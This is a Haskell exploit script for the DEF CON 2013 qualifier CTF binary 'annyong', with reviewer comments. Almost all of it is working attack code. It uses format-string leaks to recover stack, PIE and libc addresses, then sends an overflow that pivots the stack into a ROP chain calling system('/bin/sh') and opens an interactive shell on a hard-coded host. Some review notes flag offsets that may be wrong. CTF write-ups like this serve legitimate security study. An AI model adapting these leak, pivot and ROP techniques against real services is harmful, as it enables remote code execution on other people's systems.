#!/usr/bin/env stack
-- stack --stack-yaml ./stack.yaml runghc --package pwn
-- DEF CON CTF Qualifier 2013: annyong
-- http://shell-storm.org/repo/CTF/Defcon-21-quals/annyong/
{-# LANGUAGE OverloadedStrings #-}
import Data.Bits
import qualified Data.ByteString.Char8 as BS
import Data.Maybe
import Data.Monoid ((<>))
import Data.Word
import Numeric (showHex)
-- https://github.com/Tosainu/pwn.hs
import Pwn
-- | Exploit driver for the "annyong" binary: leak a stack address and the
-- PIE load base through one format string, leak a libc address through a
-- second one, then send a single overflow that pivots the stack into a ROP
-- chain calling system("/bin/sh").  Every offset below is specific to one
-- build of the target and of its libc, and the host/port is hard-coded.
main :: IO ()
main = do
  r <- remote "192.168.122.10" 4000
  -- Offsets relative to the binary's load base (PIE) and to libc's base.
  let __libc_csu_init' = 0x00001130
      printf_got' = 0x202038
      libc_printf' = 0x00050cf0
      libc_system' = 0x00041490
      -- ROP gadgets (ret' is defined but never used below)
      ret' = 0x00000ac5 -- 0x00000ac5: ret ; (17 found)
      leave_ret' = 0x00000dc1 -- 0x00000dc1: leave ; ret ; (5 found)
      libc_pop_rdi_ret' = 0x00022482 -- 0x00022482: pop rdi ; ret ; (480 found)
      -- radare2 annotation of the vulnerable function:
      -- sub.stdin_184_8c ();
      -- ; var int buf @ rbp-0x810
      -- ; var int canary @ rbp-0x4
      -- The input buffer starts at rbp-0x810 and the 4-byte canary slot at
      -- rbp-4, so 0x80c bytes of input fit before the canary is touched.
      canary = 0x4
      buflen = 0x810 - canary
  info "leak informations"
  -- Stack dump taken at the fgets call; $rdi is the input buffer:
  -- gdb-peda$ pdisas $rip /1
  -- => 0x5555555550bc: call 0x555555554ba0 <fgets@plt>
  -- gdb-peda$ x/300gx $rdi
  -- 0x7fffffffe150: 0x0000000000000000 0x0000000000000000
  -- 0x7fffffffe160: 0x0000000000000000 0x0000000000000000
  -- ...
  -- 0x7fffffffe920: 0x0000000000000000 0x0000555555554ad3
  -- 0x7fffffffe930: 0x00007fffffffea58 0x0000555555555175 <-- rbp2, __libc_csu_init+69
  -- 0x7fffffffe940: 0x0000000000000000 0x0000000000000000
  -- 0x7fffffffe950: 0x0000555555555130 0x0000000055554c60 <- _, canary
  -- 0x7fffffffe960: 0x00007fffffffe970 0x0000555555555127 <- rbp1, main
  -- 0x7fffffffe970: 0x0000000000000000 0x00007ffff7a52b45
  -- The index arithmetic treats qword 0 of the buffer as printf argument 6
  -- (the first stack-passed vararg on x86-64 SysV), i.e. it assumes the
  -- buffer is exactly at the caller's rsp when printf runs.  "rbp2" is a
  -- saved rbp left on the stack at a fixed distance (0x908) from the
  -- buffer; the qword after it is a return address into __libc_csu_init+69.
  let rbp2_index = 6 + ((0x7fffffffe930 - 0x7fffffffe150) `quot` 8)
      __libc_csu_init_index = 6 + ((0x7fffffffe938 - 0x7fffffffe150) `quot` 8)
  -- "%<n>$p %<m>$p" prints both qwords as "0x..." strings, which `read`
  -- accepts as Word64 hex literals.
  sendline r $ BS.pack $ "%" <> show rbp2_index <> "$p " <>
               "%" <> show __libc_csu_init_index <> "$p"
  -- NOTE(review): `read` and the `a:b:_` pattern are both partial; a reply
  -- such as "(nil)" or a short line aborts the script with an opaque error.
  rbp2:__libc_csu_init:_ <- map (read :: String -> Word64) . words . BS.unpack <$> recvline r
  -- rsp is the address of the input buffer (0x7fffffffea58 - 0x908 =
  -- 0x7fffffffe150 in the dump above); base is the PIE load address.
  let rsp = rbp2 - 0x908
      base = __libc_csu_init - 69 - __libc_csu_init'
  success $ "rsp = 0x" <> showHex rsp ""
  success $ "base = 0x" <> showHex base ""
  -- Second format string: "%7$6s" dereferences the pointer placed after it
  -- and echoes printf's GOT entry (a libc address) as raw bytes.  The width
  -- of 6 makes the output at least 6 bytes so `recvn r 6` cannot block; if
  -- the GOT value has a NUL among its low 6 bytes, the padding is spaces and
  -- the decoded address is wrong.
  -- NOTE(review): "%7$6s " is 6 bytes, so the pointer starts at buffer
  -- offset 6, whereas argument 7 under the numbering used above is the qword
  -- at offset 8 -- confirm this alignment against the binary before reuse.
  sendline r $ BS.append "%7$6s " $ fromJust $ p64 $ base + printf_got'
  leak <- recvn r 6
  -- Widen the 6 leaked bytes to a little-endian qword (the top two bytes of
  -- a canonical user-space address are zero).  Partial pattern: u64 on a
  -- malformed leak crashes here.
  let Just libc_printf = u64 $ BS.append leak "\x00\x00"
      libc_base = libc_printf - libc_printf'
  success $ "libc = 0x" <> showHex libc_base ""
  info "execute '/bin/sh'"
  -- Payload layout (offsets from the buffer start, which equals rsp):
  --   0x000  "NyaNya\0\0"   marker echoed by printf; recvuntil syncs on it
  --   0x008  "/bin/sh\0"    argument handed to system()
  --   0x010  rsp            rbp popped by the pivoting leave;ret gadget
  --   0x018  ROP chain      pop rdi; ret / &"/bin/sh" / system
  --   ...    'A' padding up to the canary slot
  --   0x80c  0xdeadbeef     overwrites the 4-byte canary
  --   0x810  rsp + 0x10     saved rbp; the gadget's `leave` then lands rsp
  --                         on 0x018 and `ret` enters the chain
  --   0x818  leave;ret      return address of the vulnerable frame
  -- Presumably the failed-canary path still returns through this frame's
  -- saved rbp / return address (the original comment says the broken canary
  -- "triggers" the ROP) -- confirm against the binary.
  -- NOTE(review): rophead is never used, and the chain actually starts at
  -- rsp + 0x18 (marker, "/bin/sh", fake rbp), not rsp + 0x20.
  let rophead = rsp + 0x20
      binsh = rsp + 0x8
      rop = BS.concat $ catMaybes
        [ p64 $ libc_base + libc_pop_rdi_ret'
        , p64 binsh
        , p64 $ libc_base + libc_system'
        ]
      buf = BS.concat $ catMaybes
        [ Just "NyaNya\x00\x00"
        , Just "/bin/sh\x00"
        , p64 rsp -- next rbp
        , Just rop
        , Just $ BS.replicate (buflen - 0x18 - BS.length rop) 'A'
        , p32 0xdeadbeef -- break canary to trigger ROP
        , p64 $ rsp + 0x10 -- stack pivoting
        , p64 $ base + leave_ret'
        ]
  sendline r buf
  -- Drop everything the target prints up to and including the marker.
  recvuntil r "NyaNya"
  interactive r